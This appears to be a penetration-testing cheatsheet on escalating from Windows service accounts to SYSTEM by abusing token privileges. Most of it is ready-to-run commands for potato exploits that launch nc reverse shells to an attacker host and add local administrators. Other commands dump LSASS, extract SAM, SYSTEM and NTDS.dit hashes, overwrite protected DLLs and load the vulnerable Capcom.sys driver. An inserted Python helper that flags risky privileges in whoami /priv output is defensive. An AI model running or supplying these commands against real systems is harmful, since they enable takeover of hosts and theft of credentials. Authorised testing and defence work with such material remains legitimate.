Token & Potato Attacks
Abuse Windows token privileges to escalate from service accounts (IIS, MSSQL, etc.) to SYSTEM. If you have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, you're one potato away from SYSTEM.
Privilege Check
First, check if you have exploitable token privileges.
PS C:\> whoami /priv
Key privileges to look for:
| Privilege | What It Enables |
|---|---|
| SeImpersonatePrivilege | Potato attacks (SYSTEM via token impersonation) |
| SeAssignPrimaryTokenPrivilege | Potato attacks (assign tokens to new processes) |
| SeDebugPrivilege | Inject into SYSTEM processes, dump LSASS |
| SeBackupPrivilege | Read any file (including SAM, SYSTEM hives) |
| SeRestorePrivilege | Write any file (DLL hijacking into protected dirs) |
| SeTakeOwnershipPrivilege | Take ownership of any object (files, registry keys) |
| SeLoadDriverPrivilege | Load a kernel driver (kernel-level code execution) |
| SeManageVolumePrivilege | Read any file via raw disk access |
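A small triage helper, added here as an example and not part of the original cheatsheet: it parses the text output of `whoami /priv` and flags the privileges from the table above, so output collected from service accounts during an assessment can be checked in bulk. The sample output and the `HIGH_RISK` map are constructed from the table, not from any real host.

```python
"""Parse `whoami /priv` output and flag high-risk token privileges.
Added example (not from the original page); sample data is constructed."""
import re

# Privileges from the table above (assumption: the page's list, not an
# exhaustive catalogue of dangerous privileges).
HIGH_RISK = {
    "SeImpersonatePrivilege": "potato attacks (token impersonation)",
    "SeAssignPrimaryTokenPrivilege": "potato attacks (assign tokens to new processes)",
    "SeDebugPrivilege": "open any process, dump LSASS",
    "SeBackupPrivilege": "read any file (SAM/SYSTEM hives)",
    "SeRestorePrivilege": "write any file (DLL hijacking)",
    "SeTakeOwnershipPrivilege": "take ownership of any object",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeManageVolumePrivilege": "raw disk access",
}

# Constructed sample of `whoami /priv` output, shaped like a service-account token.
SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One privilege row: name, free-text description, then Enabled/Disabled.
LINE_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

def parse_privs(text):
    """Return {privilege_name: state} for every privilege row in the output."""
    privs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def risky_privs(text):
    """Return [(name, state, impact)] for each high-risk privilege the token holds.
    A Disabled privilege is still held: the process can enable it itself,
    so it is reported as exposure rather than treated as safe."""
    return [(name, state, HIGH_RISK[name])
            for name, state in parse_privs(text).items() if name in HIGH_RISK]

if __name__ == "__main__":
    print(risky_privs(SAMPLE))
```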
SeImpersonatePrivilege is the most common one you'll see. IIS application pool accounts, MSSQL service accounts, and any service running as NT AUTHORITY\LOCAL SERVICE or NETWORK SERVICE typically have it.
Potato Attacks
All potato attacks exploit the same core concept: trick a SYSTEM-level process into authenticating to your listener, then impersonate the resulting token. The variants differ in which coercion mechanism they use.
GodPotato
Works on Windows Server 2012 through Server 2022 and Windows 8 through Windows 11. Uses DCOM/RPCSS to get a SYSTEM token. [Requires SeImpersonatePrivilege]
PS C:\> .\GodPotato.exe -cmd "cmd /c whoami"
Reverse shell.
PS C:\> .\GodPotato.exe -cmd "cmd /c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
Add local admin.
PS C:\> .\GodPotato.exe -cmd "cmd /c net localgroup Administrators <USER> /add"
SweetPotato
Combines multiple potato techniques (EfsPotato, PrintSpoofer, and more). Automatically selects the best method. [Requires SeImpersonatePrivilege]
PS C:\> .\SweetPotato.exe -e EfsRpc -p C:\Temp\nc.exe -a "<LHOST> <LPORT> -e cmd.exe"
PS C:\> .\SweetPotato.exe -e EfsRpc -p cmd.exe -a "/c net localgroup Administrators <USER> /add"
JuicyPotatoNG
Updated version of JuicyPotato. Abuses DCOM to get a SYSTEM token. Works on modern Windows. [Requires SeImpersonatePrivilege]
PS C:\> .\JuicyPotatoNG.exe -t * -p cmd.exe -a "/c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
PS C:\> .\JuicyPotatoNG.exe -t * -p cmd.exe -a "/c net localgroup Administrators <USER> /add"
PrintSpoofer
Abuses the Print Spooler service to capture a SYSTEM token via named pipes. [Requires SeImpersonatePrivilege]
PS C:\> .\PrintSpoofer64.exe -i -c cmd
PS C:\> .\PrintSpoofer64.exe -c "cmd /c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe"
Check whether the Spooler service is running first.
PS C:\> sc query spooler
RoguePotato
Uses a remote OXID resolver to bypass protections added after the original JuicyPotato was patched. [Requires SeImpersonatePrivilege]
Requires a listener on a machine you control (port 135).
# On attacker: redirect port 135 to the target
PS C:\> socat tcp-listen:135,reuseaddr,fork tcp:<TARGET>:9999
PS C:\> .\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -l 9999
JuicyPotato (Legacy)
Original potato for older systems (Windows Server 2008/2012/2016, Windows 7/8/10 before 1809). [Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege]
PS C:\> .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -t *
With a specific CLSID (needed for some OS versions).
PS C:\> .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c C:\Temp\nc.exe <LHOST> <LPORT> -e cmd.exe" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
Potato Selection Guide
| Potato | Best For | Notes |
|---|---|---|
| GodPotato | First choice on any modern system | Most reliable, broadest compatibility |
| SweetPotato | Fallback (tries multiple methods) | Auto-selects the best technique |
| JuicyPotatoNG | Modern Windows | Updated JuicyPotato |
| PrintSpoofer | When Spooler is running | Simple and reliable |
| RoguePotato | When others fail | Requires external listener |
| JuicyPotato | Legacy systems (pre-2019) | Needs working CLSID |
SeDebugPrivilege Abuse
Allows you to open any process (including SYSTEM processes) with full access. [Requires SeDebugPrivilege]
Migrate into a SYSTEM Process
Via Meterpreter.
# Find a SYSTEM process (e.g., winlogon.exe, lsass.exe)
msf> migrate <PID>
msf> getuid # Should be NT AUTHORITY\SYSTEM
Dump LSASS
# Create a minidump of LSASS
PS C:\> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full
Then extract offline with Mimikatz or pypykatz.
PS C:\> pypykatz lsa minidump lsass.dmp
Inject into SYSTEM Process
Using a tool like psgetsystem.
PS C:\> .\PsGetsystem.ps1
PS C:\> [MyProcess]::CreateProcessFromParent((Get-Process winlogon).Id, "cmd.exe", "")
SeBackupPrivilege Abuse
Allows reading any file on the system, bypassing ACLs. [Requires SeBackupPrivilege]
Extract SAM and SYSTEM Hives
PS C:\> reg save HKLM\SAM C:\Temp\SAM
PS C:\> reg save HKLM\SYSTEM C:\Temp\SYSTEM
Extract hashes offline.
PS C:\> impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Copy Protected Files
Use robocopy with backup mode.
PS C:\> robocopy /b "C:\Users\Administrator\Desktop" "C:\Temp\loot" secret.txt
Or use a diskshadow + robocopy workflow to copy the NTDS.dit from a DC.
# Create diskshadow script
PS C:\> echo "set context persistent nowriters" > script.txt
PS C:\> echo "add volume c: alias myalias" >> script.txt
PS C:\> echo "create" >> script.txt
PS C:\> echo "expose %myalias% z:" >> script.txt
PS C:\> diskshadow /s script.txt
PS C:\> robocopy /b z:\Windows\NTDS C:\Temp NTDS.dit
PS C:\> reg save HKLM\SYSTEM C:\Temp\SYSTEM
PS C:\> impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
SeRestorePrivilege Abuse
Allows writing any file on the system. [Requires SeRestorePrivilege]
Replace a DLL or binary in a protected directory for DLL hijacking or service binary replacement.
# Enable the privilege
PS C:\> Import-Module .\EnableSeRestorePrivilege.ps1
# Overwrite a protected file
PS C:\> copy payload.dll "C:\Windows\System32\target.dll"
SeTakeOwnershipPrivilege Abuse
Take ownership of any file or registry key, then grant yourself full access. [Requires SeTakeOwnershipPrivilege]
# Take ownership of a file
PS C:\> takeown /f "C:\Path\To\Protected\file.exe"
# Grant yourself full control
PS C:\> icacls "C:\Path\To\Protected\file.exe" /grant <USER>:F
# Now you can read/modify/replace it
On a registry key.
# Take ownership
$key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SYSTEM\CurrentControlSet\Services\<SERVICE_NAME>", [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree, [System.Security.AccessControl.RegistryRights]::TakeOwnership)
$acl = $key.GetAccessControl()
$acl.SetOwner([System.Security.Principal.NTAccount]"$env:USERNAME")
$key.SetAccessControl($acl)
SeLoadDriverPrivilege Abuse
Load a vulnerable kernel driver, then exploit it for kernel-level code execution. [Requires SeLoadDriverPrivilege]
Classic technique using the Capcom.sys driver.
# Load the vulnerable driver
PS C:\> .\EoPLoadDriver.exe System\CurrentControlSet\MyDriver C:\Temp\Capcom.sys
# Exploit the driver for SYSTEM shell
PS C:\> .\ExploitCapcom.exe
SeManageVolumePrivilege Abuse
Grants raw read access to any disk volume. [Requires SeManageVolumePrivilege]
# Use the privilege to read the raw disk and extract files
# Tools like SeManageVolumeExploit can abuse this
PS C:\> .\SeManageVolumeExploit.exe
Token Impersonation (Meterpreter)
If you have a Meterpreter session with impersonation privileges.
msf> load incognito
msf> list_tokens -u
msf> impersonate_token "NT AUTHORITY\SYSTEM"
msf> getuid
List available delegation tokens.
msf> list_tokens -u